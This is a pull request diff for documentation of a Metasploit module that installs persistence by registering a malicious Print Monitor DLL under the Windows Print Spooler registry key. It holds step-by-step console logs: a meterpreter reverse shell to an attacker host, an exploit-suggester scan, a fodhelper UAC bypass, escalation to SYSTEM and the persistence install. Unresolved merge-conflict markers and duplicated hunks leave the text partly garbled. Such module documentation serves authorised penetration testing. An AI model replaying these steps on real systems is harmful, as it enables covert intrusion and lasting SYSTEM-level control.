### PR TITLE
Add Persistence Technique: Windows Port Monitor

### DIFF
--- a/documentation/modules/exploit/windows/persistence/port_monitor.md
+++ b/documentation/modules/exploit/windows/persistence/port_monitor.md
@@ -3,7 +3,6 @@
 ### Windows Print Spooler (Port Monitor Persistence)
 
 The Windows Print Spooler service supports loading custom **Print Monitor DLLs**, which are registered under:
-
 `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`
 
 At system startup (or when the Spooler service restarts), Windows automatically loads all configured monitor DLLs.
@@ -16,28 +15,13 @@ This module leverages the **manual registry method** (instead of the `AddMonitor
 * Creating or modifying a monitor registry key
 * Setting the `Driver` value to point to the payload DLL
 
-
 Since this requires writing to **System32** and modifying **HKLM**, **administrative or SYSTEM privileges are required**.
-
 
 
 ## Verification Steps
 
 1. Start `msfconsole`
 2. Get a SYSTEM session
-<<<<<<< Updated upstream
-3. `use exploit/windows/persistence/port\_monitor`
-4. `set SESSION <id>`
-5. `check`
-6. `run`
-7. `sessions -i <id>`
-8. `shell`
-9. `net stop spooler`
-10. `net stop spooler`
-11. `reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors<monitor\_name>`
-
-
-=======
 3. use exploit/windows/persistence/port_monitor
 4. set SESSION
 5. run
@@ -45,13 +29,12 @@ Since this requires writing to **System32** and modifying **HKLM**, **administra
 7. Trigger the payload execution (e.g. by restarting the service or rebooting the system, wait for callback or interact with a handler)
 8. A new (user/SYSTEM) session should be received
 9. (Optional) Verify registry entry under: `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\<MONITOR_NAME>`
->>>>>>> Stashed changes
 
 ## Options
 
 ### MONITOR_NAME
 
-Name of the registry key created under:
+Name of the registry key created under: 
 `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`
 
 (Default: `Hadess`)
@@ -185,7 +168,7 @@ LHOST => 172.21.176.212
 msf exploit(windows/local/bypassuac_fodhelper) > set LPORT 5555
 LPORT => 5555
 msf exploit(windows/local/bypassuac_fodhelper) > run
-[*] Started reverse TCP handler on 172.21.176.212:5555
+[*] Started reverse TCP handler on 172.21.176.212:5555 
 [*] UAC is Enabled, checking level...
 [+] Part of Administrators group! Continuing...
 [+] UAC is set to Default
@@ -312,7 +295,6 @@ The Print Spooler service was started successfully.
 C:\Windows\System32>reg query HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Hadess
 
 reg query HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Hadess
-
 
 
 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Hadess

--- a/documentation/modules/exploit/windows/persistence/port_monitor.md
+++ b/documentation/modules/exploit/windows/persistence/port_monitor.md
@@ -4,7 +4,7 @@
 
 The Windows Print Spooler service supports loading custom **Print Monitor DLLs**, which are registered under:
 
-`HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Print\\\\\\\\Monitors`
+`HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`
 
 At system startup (or when the Spooler service restarts), Windows automatically loads all configured monitor DLLs.
 This behavior can be abused to achieve **persistence**,
@@ -12,18 +12,12 @@ as any malicious DLL placed and registered in this location will be executed by 
 
 This module leverages the **manual registry method** (instead of the `AddMonitor` API) by:
 
-* Writing a malicious DLL to `%WINDIR%\\\\\\\\System32`
+* Writing a malicious DLL to `%WINDIR%\System32`
 * Creating or modifying a monitor registry key
 * Setting the `Driver` value to point to the payload DLL
 
 
-
 Since this requires writing to **System32** and modifying **HKLM**, **administrative or SYSTEM privileges are required**.
-
-This technique is mapped to:
-
-* MITRE ATT\&CK T1547.010 (Port Monitors)
-* MITRE ATT\&CK T1112 (Modify Registry)
 
 
 
@@ -31,6 +25,7 @@ This technique is mapped to:
 
 1. Start `msfconsole`
 2. Get a SYSTEM session
+<<<<<<< Updated upstream
 3. `use exploit/windows/persistence/port\_monitor`
 4. `set SESSION <id>`
 5. `check`
@@ -42,201 +37,217 @@ This technique is mapped to:
 11. `reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors<monitor\_name>`
 
 
+=======
+3. use exploit/windows/persistence/port_monitor
+4. set SESSION
+5. run
+6. Restart the Print Spooler service if it was not restarted automatically by the module
+7. Trigger the payload execution (e.g. by restarting the service or rebooting the system, wait for callback or interact with a handler)
+8. A new (user/SYSTEM) session should be received
+9. (Optional) Verify registry entry under: `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\<MONITOR_NAME>`
+>>>>>>> Stashed changes
 
 ## Options
 
-### SESSION (Required)
-
-The session to run this module on.
-
-### LHOST (Required)
-
-The local host to receive the reverse connection.
-
-### LPORT (Required)
-
-The local port to receive the reverse connection.
-
-### MONITOR\_NAME
+### MONITOR_NAME
 
 Name of the registry key created under:
+`HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`
 
-HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors
+(Default: `Hadess`)
 
-### DLL\_NAME
+### DLL_NAME
 
-Name of the payload DLL written to: %WINDIR%\\System32
+Name of the payload DLL written to: `%WINDIR%\\System32`
 
-### RESTART\_SPOOLER
+(Default: `persist.dll`)
+
+### RESTART_SPOOLER
 
 Restart the Print Spooler service after installation to trigger the payload immediately.
 
-
+(Default: `true`)
 
 ## Scenarios
 
 ### Initial System Session
 
-```msf exploit(windows/persistence/port\\\\\\\_monitor) > use exploit/multi/handler
-\\\\\\\[\\\\\\\*] Using configured payload generic/shell\\\\\\\_reverse\\\\\\\_tcp
-msf exploit(multi/handler) > windows/x64/meterpreter/reverse\\\\\\\_https
-\\\\\\\[-] Unknown command: windows/x64/meterpreter/reverse\\\\\\\_https. Run the help command for more details.
-This is a module we can load. Do you want to use windows/x64/meterpreter/reverse\\\\\\\_https? \\\\\\\[y/N]   exit
-msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse\\\\\\\_https
-payload => windows/x64/meterpreter/reverse\\\\\\\_https
+```msf exploit(windows/persistence/port_monitor) > use exploit/multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf exploit(multi/handler) > windows/x64/meterpreter/reverse_https
+[-] Unknown command: windows/x64/meterpreter/reverse_https. Run the help command for more details.
+This is a module we can load. Do you want to use windows/x64/meterpreter/reverse_https? [y/N]   exit
+msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
+payload => windows/x64/meterpreter/reverse_https
 msf exploit(multi/handler) > set LHOST 172.21.176.212
 LHOST => 172.21.176.212
 msf exploit(multi/handler) > set LPORT 4444
 LPORT => 4444
 msf exploit(multi/handler) > run
-\\\\\\\[\\\\\\\*] Started HTTPS reverse handler on https://172.21.176.212:4444
-\\\\\\\[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: abgnhr2o) Without a database connected that payload UUID tracking will not work!
-\\\\\\\[\\\\\\\*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: abgnhr2o) Staging x64 payload (233052 bytes) ...
-\\\\\\\[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: abgnhr2o) Without a database connected that payload UUID tracking will not work!
-\\\\\\\[\\\\\\\*] Meterpreter session 1 opened (172.21.176.212:4444 -> 172.21.176.1:59514) at 2026-03-11 01:49:18 +0200
+[*] Started HTTPS reverse handler on https://172.21.176.212:4444
+[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: abgnhr2o) Without a database connected that payload UUID tracking will not work!
+[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: abgnhr2o) Staging x64 payload (233052 bytes) ...
+[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: abgnhr2o) Without a database connected that payload UUID tracking will not work!
+[*] Meterpreter session 1 opened (172.21.176.212:4444 -> 172.21.176.1:59514) at 2026-03-11 01:49:18 +0200
 
 meterpreter > background
-\\\\\\\[\\\\\\\*] Backgrounding session 1...
+[*] Backgrounding session 1...
 
-msf exploit(multi/handler) > use post/multi/recon/local\\\\\\\_exploit\\\\\\\_suggester
-msf post(multi/recon/local\\\\\\\_exploit\\\\\\\_suggester) > set SESSION 1
+msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
+msf post(multi/recon/local_exploit_suggester) > set SESSION 1
 SESSION => 1
-msf post(multi/recon/local\\\\\\\_exploit\\\\\\\_suggester) > run
-\\\\\\\[\\\\\\\*] 172.21.176.1 - Collecting local exploits for x64/windows...
-\\\\\\\[\\\\\\\*] 172.21.176.1 - 243 exploit checks are being tried...
-\\\\\\\[+] 172.21.176.1 - exploit/windows/local/bypassuac\\\\\\\_dotnet\\\\\\\_profiler: The target appears to be vulnerable.
-\\\\\\\[+] 172.21.176.1 - exploit/windows/local/bypassuac\\\\\\\_fodhelper: The target appears to be vulnerable.
-\\\\\\\[+] 172.21.176.1 - exploit/windows/local/bypassuac\\\\\\\_sdclt: The target appears to be vulnerable.
-\\\\\\\[+] 172.21.176.1 - exploit/windows/persistence/registry: The target is vulnerable. Registry writable
-\\\\\\\[+] 172.21.176.1 - exploit/windows/persistence/registry\\\\\\\_userinit: The target is vulnerable. Registry likely exploitable
-\\\\\\\[+] 172.21.176.1 - exploit/windows/persistence/startup\\\\\\\_folder: The target appears to be vulnerable. Likely exploitable, able to write test file to C:\\\\\\\\Users\\\\\\\\DELL\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup
-\\\\\\\[\\\\\\\*] Running check method for exploit 63 / 63
-\\\\\\\[\\\\\\\*] 172.21.176.1 - Valid modules for session 1:
+msf post(multi/recon/local_exploit_suggester) > run
+[*] 172.21.176.1 - Collecting local exploits for x64/windows...
+[*] 172.21.176.1 - 243 exploit checks are being tried...
+[+] 172.21.176.1 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
+[+] 172.21.176.1 - exploit/windows/local/bypassuac_fodhelper: The target appears to be vulnerable.
+[+] 172.21.176.1 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
+[+] 172.21.176.1 - exploit/windows/persistence/registry: The target is vulnerable. Registry writable
+[+] 172.21.176.1 - exploit/windows/persistence/registry_userinit: The target is vulnerable. Registry likely exploitable
+[+] 172.21.176.1 - exploit/windows/persistence/startup_folder: The target appears to be vulnerable. Likely exploitable, able to write test file to C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
+[*] Running check method for exploit 63 / 63
+[*] 172.21.176.1 - Valid modules for session 1:
 ============================
 
  #   Name                                                              Potentially Vulnerable?  Check Result
  -   ----                                                              -----------------------  ------------
- 1   exploit/windows/local/bypassuac\\\\\\\_dotnet\\\\\\\_profiler                   Yes                      The target appears to be vulnerable.
- 2   exploit/windows/local/bypassuac\\\\\\\_fodhelper                         Yes                      The target appears to be vulnerable.
- 3   exploit/windows/local/bypassuac\\\\\\\_sdclt                             Yes                      The target appears to be vulnerable.
+ 1   exploit/windows/local/bypassuac_dotnet_profiler                   Yes                      The target appears to be vulnerable.
+ 2   exploit/windows/local/bypassuac_fodhelper                         Yes                      The target appears to be vulnerable.
+ 3   exploit/windows/local/bypassuac_sdclt                             Yes                      The target appears to be vulnerable.
  4   exploit/windows/persistence/registry                              Yes                      The target is vulnerable. Registry writable
- 5   exploit/windows/persistence/registry\\\\\\\_userinit                     Yes                      The target is vulnerable. Registry likely exploitable
- 6   exploit/windows/persistence/startup\\\\\\\_folder                        Yes                      The target appears to be vulnerable. Likely exploitable, able to write test file to C:\\\\\\\\Users\\\\\\\\DELL\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup
- 7   exploit/multi/persistence/ssh\\\\\\\_key                                 No                       The target is not exploitable. sshd\\\\\\\_config file not found
- 8   exploit/windows/local/agnitum\\\\\\\_outpost\\\\\\\_acs                         No                       The target is not exploitable.
- 9   exploit/windows/local/always\\\\\\\_install\\\\\\\_elevated                     No                       The target is not exploitable.
- 10  exploit/windows/local/bits\\\\\\\_ntlm\\\\\\\_token\\\\\\\_impersonation               No                       The target is not exploitable.
- 11  exploit/windows/local/bypassuac\\\\\\\_comhijack                         No                       The target is not exploitable.
- 12  exploit/windows/local/bypassuac\\\\\\\_eventvwr                          No                       The target is not exploitable.
- 13  exploit/windows/local/bypassuac\\\\\\\_sluihijack                        No                       The target is not exploitable.
- 14  exploit/windows/local/canon\\\\\\\_driver\\\\\\\_privesc                        No                       The target is not exploitable. No Canon TR150 driver directory found
- 15  exploit/windows/local/capcom\\\\\\\_sys\\\\\\\_exec                             No                       The target is not exploitable. Target contains a block list which prevents the vulnerable driver from being loaded!
- 16  exploit/windows/local/cve\\\\\\\_2019\\\\\\\_1458\\\\\\\_wizardopium                   No                       The target is not exploitable.
- 17  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_0787\\\\\\\_bits\\\\\\\_arbitrary\\\\\\\_file\\\\\\\_move      No                       The target is not exploitable. Target is not running a vulnerable version of Windows!
- 18  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_0796\\\\\\\_smbghost                      No                       The target is not exploitable.
- 19  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_1048\\\\\\\_printerdemon                  No                       The target is not exploitable.
- 20  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_1054\\\\\\\_drawiconex\\\\\\\_lpe                No                       The target is not exploitable. No target for win32k.sys version 6.2.26100.7705
- 21  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_1313\\\\\\\_system\\\\\\\_orchestrator           No                       The target is not exploitable.
- 22  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_1337\\\\\\\_printerdemon                  No                       The target is not exploitable.
- 23  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_17136                              No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
- 24  exploit/windows/local/cve\\\\\\\_2021\\\\\\\_21551\\\\\\\_dbutil\\\\\\\_memmove               No                       The target is not exploitable.
- 25  exploit/windows/local/cve\\\\\\\_2021\\\\\\\_40449                              No                       The target is not exploitable. Target is not running a vulnerable version of Windows!
- 26  exploit/windows/local/cve\\\\\\\_2022\\\\\\\_21882\\\\\\\_win32k                       No                       The target is not exploitable.
- 27  exploit/windows/local/cve\\\\\\\_2022\\\\\\\_21999\\\\\\\_spoolfool\\\\\\\_privesc            No                       The target is not exploitable.
- 28  exploit/windows/local/cve\\\\\\\_2022\\\\\\\_3699\\\\\\\_lenovo\\\\\\\_diagnostics\\\\\\\_driver     No                       The target is not exploitable.
- 29  exploit/windows/local/cve\\\\\\\_2023\\\\\\\_21768\\\\\\\_afd\\\\\\\_lpe                      No                       The target is not exploitable. The exploit only supports Windows 11 22H2
- 30  exploit/windows/local/cve\\\\\\\_2023\\\\\\\_28252\\\\\\\_clfs\\\\\\\_driver                  No                       The target is not exploitable.
- 31  exploit/windows/local/cve\\\\\\\_2024\\\\\\\_30085\\\\\\\_cloud\\\\\\\_files                  No                       The target is not exploitable.
- 32  exploit/windows/local/cve\\\\\\\_2024\\\\\\\_30088\\\\\\\_authz\\\\\\\_basep                  No                       The target is not exploitable. Version detected: Windows 10+ Build 26200. Revision number detected: 7840.
- 33  exploit/windows/local/cve\\\\\\\_2024\\\\\\\_35250\\\\\\\_ks\\\\\\\_driver                    No                       The target is not exploitable. Version detected: Windows 10+ Build 26200
- 34  exploit/windows/local/gog\\\\\\\_galaxyclientservice\\\\\\\_privesc             No                       The target is not exploitable. Galaxy Client Service not found
- 35  exploit/windows/local/ikeext\\\\\\\_service                              No                       The check raised an exception.
- 36  exploit/windows/local/lexmark\\\\\\\_driver\\\\\\\_privesc                      No                       The target is not exploitable. No Lexmark print drivers in the driver store
- 37  exploit/windows/local/ms10\\\\\\\_092\\\\\\\_schelevator                        No                       The target is not exploitable. Windows 11 24H2+ (10.0 Build 26200). is not vulnerable
- 38  exploit/windows/local/ms14\\\\\\\_058\\\\\\\_track\\\\\\\_popup\\\\\\\_menu                   No                       Cannot reliably check exploitability.
- 39  exploit/windows/local/ms15\\\\\\\_051\\\\\\\_client\\\\\\\_copy\\\\\\\_image                  No                       The target is not exploitable.
- 40  exploit/windows/local/ms15\\\\\\\_078\\\\\\\_atmfd\\\\\\\_bof                          No                       The target is not exploitable.
- 41  exploit/windows/local/ms16\\\\\\\_014\\\\\\\_wmi\\\\\\\_recv\\\\\\\_notif                     No                       The target is not exploitable.
- 42  exploit/windows/local/ms16\\\\\\\_032\\\\\\\_secondary\\\\\\\_logon\\\\\\\_handle\\\\\\\_privesc     No                       The check raised an exception.
- 43  exploit/windows/local/ms16\\\\\\\_075\\\\\\\_reflection                         No                       The target is not exploitable.
- 44  exploit/windows/local/ms16\\\\\\\_075\\\\\\\_reflection\\\\\\\_juicy                   No                       The target is not exploitable.
+ 5   exploit/windows/persistence/registry_userinit                     Yes                      The target is vulnerable. Registry likely exploitable
+ 6   exploit/windows/persistence/startup_folder                        Yes                      The target appears to be vulnerable. Likely exploitable, able to write test file to C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
+ 7   exploit/multi/persistence/ssh_key                                 No                       The target is not exploitable. sshd_config file not found
+ 8   exploit/windows/local/agnitum_outpost_acs                         No                       The target is not exploitable.
+ 9   exploit/windows/local/always_install_elevated                     No                       The target is not exploitable.
+ 10  exploit/windows/local/bits_ntlm_token_impersonation               No                       The target is not exploitable.
+ 11  exploit/windows/local/bypassuac_comhijack                         No                       The target is not exploitable.
+ 12  exploit/windows/local/bypassuac_eventvwr                          No                       The target is not exploitable.
+ 13  exploit/windows/local/bypassuac_sluihijack                        No                       The target is not exploitable.
+ 14  exploit/windows/local/canon_driver_privesc                        No                       The target is not exploitable. No Canon TR150 driver directory found
+ 15  exploit/windows/local/capcom_sys_exec                             No                       The target is not exploitable. Target contains a block list which prevents the vulnerable driver from being loaded!
+ 16  exploit/windows/local/cve_2019_1458_wizardopium                   No                       The target is not exploitable.
+ 17  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move      No                       The target is not exploitable. Target is not running a vulnerable version of Windows!
+ 18  exploit/windows/local/cve_2020_0796_smbghost                      No                       The target is not exploitable.
+ 19  exploit/windows/local/cve_2020_1048_printerdemon                  No                       The target is not exploitable.
+ 20  exploit/windows/local/cve_2020_1054_drawiconex_lpe                No                       The target is not exploitable. No target for win32k.sys version 6.2.26100.7705
+ 21  exploit/windows/local/cve_2020_1313_system_orchestrator           No                       The target is not exploitable.
+ 22  exploit/windows/local/cve_2020_1337_printerdemon                  No                       The target is not exploitable.
+ 23  exploit/windows/local/cve_2020_17136                              No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
+ 24  exploit/windows/local/cve_2021_21551_dbutil_memmove               No                       The target is not exploitable.
+ 25  exploit/windows/local/cve_2021_40449                              No                       The target is not exploitable. Target is not running a vulnerable version of Windows!
+ 26  exploit/windows/local/cve_2022_21882_win32k                       No                       The target is not exploitable.
+ 27  exploit/windows/local/cve_2022_21999_spoolfool_privesc            No                       The target is not exploitable.
+ 28  exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver     No                       The target is not exploitable.
+ 29  exploit/windows/local/cve_2023_21768_afd_lpe                      No                       The target is not exploitable. The exploit only supports Windows 11 22H2
+ 30  exploit/windows/local/cve_2023_28252_clfs_driver                  No                       The target is not exploitable.
+ 31  exploit/windows/local/cve_2024_30085_cloud_files                  No                       The target is not exploitable.
+ 32  exploit/windows/local/cve_2024_30088_authz_basep                  No                       The target is not exploitable. Version detected: Windows 10+ Build 26200. Revision number detected: 7840.
+ 33  exploit/windows/local/cve_2024_35250_ks_driver                    No                       The target is not exploitable. Version detected: Windows 10+ Build 26200
+ 34  exploit/windows/local/gog_galaxyclientservice_privesc             No                       The target is not exploitable. Galaxy Client Service not found
+ 35  exploit/windows/local/ikeext_service                              No                       The check raised an exception.
+ 36  exploit/windows/local/lexmark_driver_privesc                      No                       The target is not exploitable. No Lexmark print drivers in the driver store
+ 37  exploit/windows/local/ms10_092_schelevator                        No                       The target is not exploitable. Windows 11 24H2+ (10.0 Build 26200). is not vulnerable
+ 38  exploit/windows/local/ms14_058_track_popup_menu                   No                       Cannot reliably check exploitability.
+ 39  exploit/windows/local/ms15_051_client_copy_image                  No                       The target is not exploitable.
+ 40  exploit/windows/local/ms15_078_atmfd_bof                          No                       The target is not exploitable.
+ 41  exploit/windows/local/ms16_014_wmi_recv_notif                     No                       The target is not exploitable.
+ 42  exploit/windows/local/ms16_032_secondary_logon_handle_privesc     No                       The check raised an exception.
+ 43  exploit/windows/local/ms16_075_reflection                         No                       The target is not exploitable.
+ 44  exploit/windows/local/ms16_075_reflection_juicy                   No                       The target is not exploitable.
  45  exploit/windows/local/ntapphelpcachecontrol                       No                       The check raised an exception.
- 46  exploit/windows/local/nvidia\\\\\\\_nvsvc                                No                       The check raised an exception.
- 47  exploit/windows/local/panda\\\\\\\_psevents                              No                       The target is not exploitable.
- 48  exploit/windows/local/ricoh\\\\\\\_driver\\\\\\\_privesc                        No                       The target is not exploitable. No Ricoh driver directory found
- 49  exploit/windows/local/srclient\\\\\\\_dll\\\\\\\_hijacking                      No                       The target is not exploitable. Target is not Windows Server 2012.
+ 46  exploit/windows/local/nvidia_nvsvc                                No                       The check raised an exception.
+ 47  exploit/windows/local/panda_psevents                              No                       The target is not exploitable.
+ 48  exploit/windows/local/ricoh_driver_privesc                        No                       The target is not exploitable. No Ricoh driver directory found
+ 49  exploit/windows/local/srclient_dll_hijacking                      No                       The target is not exploitable. Target is not Windows Server 2012.
  50  exploit/windows/local/tokenmagic                                  No                       The target is not exploitable.
- 51  exploit/windows/local/virtual\\\\\\\_box\\\\\\\_opengl\\\\\\\_escape                   No                       The target is not exploitable.
+ 51  exploit/windows/local/virtual_box_opengl_escape                   No                       The target is not exploitable.
  52  exploit/windows/local/webexec                                     No                       The check raised an exception.
- 53  exploit/windows/local/win\\\\\\\_error\\\\\\\_cve\\\\\\\_2023\\\\\\\_36874                    No                       The target is not exploitable.
- 54  exploit/windows/persistence/accessibility\\\\\\\_features\\\\\\\_debugger       No                       The target is not exploitable. You have admin rights to run this Module
- 55  exploit/windows/persistence/assistive\\\\\\\_technology                  No                       The target is not exploitable. You have admin rights to run this Module
- 56  exploit/windows/persistence/notepadpp\\\\\\\_plugin                      No                       The target is not exploitable. Notepad++ is probably not present
- 57  exploit/windows/persistence/port\\\\\\\_monitor                          No                       The target is not exploitable. Admin or SYSTEM privileges are required
+ 53  exploit/windows/local/win_error_cve_2023_36874                    No                       The target is not exploitable.
+ 54  exploit/windows/persistence/accessibility_features_debugger       No                       The target is not exploitable. You have admin rights to run this Module
+ 55  exploit/windows/persistence/assistive_technology                  No                       The target is not exploitable. You have admin rights to run this Module
+ 56  exploit/windows/persistence/notepadpp_plugin                      No                       The target is not exploitable. Notepad++ is probably not present
+ 57  exploit/windows/persistence/port_monitor                          No                       The target is not exploitable. Admin or SYSTEM privileges are required
  58  exploit/windows/persistence/service                               No                       The target is not exploitable. You must be System/Admin to run this Module
- 59  exploit/windows/persistence/task\\\\\\\_scheduler                        No                       The target is not exploitable. You need higher privileges to create scheduled tasks
- 60  exploit/windows/persistence/wmi/wmi\\\\\\\_event\\\\\\\_subscription\\\\\\\_event\\\\\\\_log  No                       The target is not exploitable. This module requires powershell to run
- 61  exploit/windows/persistence/wmi/wmi\\\\\\\_event\\\\\\\_subscription\\\\\\\_interval   No                       The target is not exploitable. This module requires powershell to run
- 62  exploit/windows/persistence/wmi/wmi\\\\\\\_event\\\\\\\_subscription\\\\\\\_process    No                       The target is not exploitable. This module requires powershell to run
- 63  exploit/windows/persistence/wmi/wmi\\\\\\\_event\\\\\\\_subscription\\\\\\\_uptime     No                       The target is not exploitable. This module requires powershell to run
+ 59  exploit/windows/persistence/task_scheduler                        No                       The target is not exploitable. You need higher privileges to create scheduled tasks
+ 60  exploit/windows/persistence/wmi/wmi_event_subscription_event_log  No                       The target is not exploitable. This module requires powershell to run
+ 61  exploit/windows/persistence/wmi/wmi_event_subscription_interval   No                       The target is not exploitable. This module requires powershell to run
+ 62  exploit/windows/persistence/wmi/wmi_event_subscription_process    No                       The target is not exploitable. This module requires powershell to run
+ 63  exploit/windows/persistence/wmi/wmi_event_subscription_uptime     No                       The target is not exploitable. This module requires powershell to run
 
-\\\\\\\[\\\\\\\*] Post module execution completed
-msf post(multi/recon/local\\\\\\\_exploit\\\\\\\_suggester) > use exploit/windows/local/bypassuac\\\\\\\_fodhelper
-\\\\\\\[\\\\\\\*] No payload configured, defaulting to windows/meterpreter/reverse\\\\\\\_tcp
-msf exploit(windows/local/bypassuac\\\\\\\_fodhelper) > set SESSION 1
+[*] Post module execution completed
+msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/bypassuac_fodhelper
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf exploit(windows/local/bypassuac_fodhelper) > set SESSION 1
 SESSION => 1
-msf exploit(windows/local/bypassuac\\\\\\\_fodhelper) > set LHOST 172.21.176.212
+msf exploit(windows/local/bypassuac_fodhelper) > set LHOST 172.21.176.212
 LHOST => 172.21.176.212
-msf exploit(windows/local/bypassuac\\\\\\\_fodhelper) > set LPORT 5555
+msf exploit(windows/local/bypassuac_fodhelper) > set LPORT 5555
 LPORT => 5555
-msf exploit(windows/local/bypassuac\\\\\\\_fodhelper) > run
-\\\\\\\[\\\\\\\*] Started reverse TCP handler on 172.21.176.212:5555 
-\\\\\\\[\\\\\\\*] UAC is Enabled, checking level...
-\\\\\\\[+] Part of Administrators group! Continuing...
-\\\\\\\[+] UAC is set to Default
-\\\\\\\[+] BypassUAC can bypass this setting, continuing...
-\\\\\\\[\\\\\\\*] Configuring payload and stager registry keys ...
-\\\\\\\[\\\\\\\*] Executing payload: C:\\\\\\\\WINDOWS\\\\\\\\system32\\\\\\\\cmd.exe /c C:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\fodhelper.exe
-\\\\\\\[\\\\\\\*] Sending stage (190534 bytes) to 172.21.176.1
-\\\\\\\[\\\\\\\*] Cleaning up registry keys ...
-\\\\\\\[\\\\\\\*] Meterpreter session 2 opened (172.21.176.212:5555 -> 172.21.176.1:53775) at 2026-03-11 02:13:39 +0200
+msf exploit(windows/local/bypassuac_fodhelper) > run
+[*] Started reverse TCP handler on 172.21.176.212:5555
+[*] UAC is Enabled, checking level...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] Configuring payload and stager registry keys ...
+[*] Executing payload: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\System32\fodhelper.exe
+[*] Sending stage (190534 bytes) to 172.21.176.1
+[*] Cleaning up registry keys ...
+[*] Meterpreter session 2 opened (172.21.176.212:5555 -> 172.21.176.1:53775) at 2026-03-11 02:13:39 +0200
+
+meterpreter > background
+[*] Backgrounding session 2...
+msf exploit(windows/local/bypassuac_fodhelper) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                    Information       Connection
+  --  ----  ----                    -----------       ----------
+  1         meterpreter x64/window  NERO\DELL @ NERO  172.21.176.212:4444 -> 172.2
+            s                                         1.176.1:59514 (172.21.176.1)
+  2         meterpreter x86/window  NERO\DELL @ NERO  172.21.176.212:5555 -> 172.2
+            s                                         1.176.1:53775 (172.21.176.1)
+
+msf exploit(windows/local/bypassuac_fodhelper) > sessions -i 2
+[*] Starting interaction with 2...
 
 meterpreter > getuid
-Server username: NERO\\\\\\\\DELL
+Server username: NERO\DELL
 meterpreter > getsystem
 ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
 meterpreter > getuid
-Server username: NT AUTHORITY\\\\\\\\SYSTEM
+Server username: NT AUTHORITY\SYSTEM
 meterpreter > background
-\\\\\\\[\\\\\\\*] Backgrounding session 2...
-
+[*] Backgrounding session 2...
 ```
 
 
 
 ### Install Persistence
 
-```msf exploit(windows/local/bypassuac\\\\\\\_fodhelper) > use exploit/windows/persistence/port\\\\\\\_monitor
-\\\\\\\[\\\\\\\*] Using configured payload windows/meterpreter/reverse\\\\\\\_tcp
-msf exploit(windows/persistence/port\\\\\\\_monitor) > set SESSION 2
+```msf exploit(windows/local/bypassuac_fodhelper) > use exploit/windows/persistence/port_monitor
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/port_monitor) > set SESSION 2
 SESSION => 2
-msf exploit(windows/persistence/port\\\\\\\_monitor) > show options
+msf exploit(windows/persistence/port_monitor) > show options
 
-Module options (exploit/windows/persistence/port\\\\\\\_monitor):
+Module options (exploit/windows/persistence/port_monitor):
 
    Name             Current Setting  Required  Description
    ----             ---------------  --------  -----------
-   DLL\\\\\\\_NAME         persist.dll      no        DLL filename to write in %WINDIR%\\\\\\\\S
+   DLL_NAME         persist.dll      no        DLL filename to write in %WINDIR%\S
                                                ystem32.
-   MONITOR\\\\\\\_NAME     Hadess           no        Name of the print monitor registry
+   MONITOR_NAME     Hadess           no        Name of the print monitor registry
                                                key to create.
-   RESTART\\\\\\\_SPOOLER  false            yes       Restart the Print Spooler service t
+   RESTART_SPOOLER  false            yes       Restart the Print Spooler service t
                                                o trigger monitor loading immediate
                                                ly.
    SESSION          2                yes       The session to run this module on
 
 
-Payload options (windows/meterpreter/reverse\\\\\\\_tcp):
+Payload options (windows/meterpreter/reverse_tcp):
 
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
@@ -257,34 +268,34 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
-msf exploit(windows/persistence/port\\\\\\\_monitor) > check
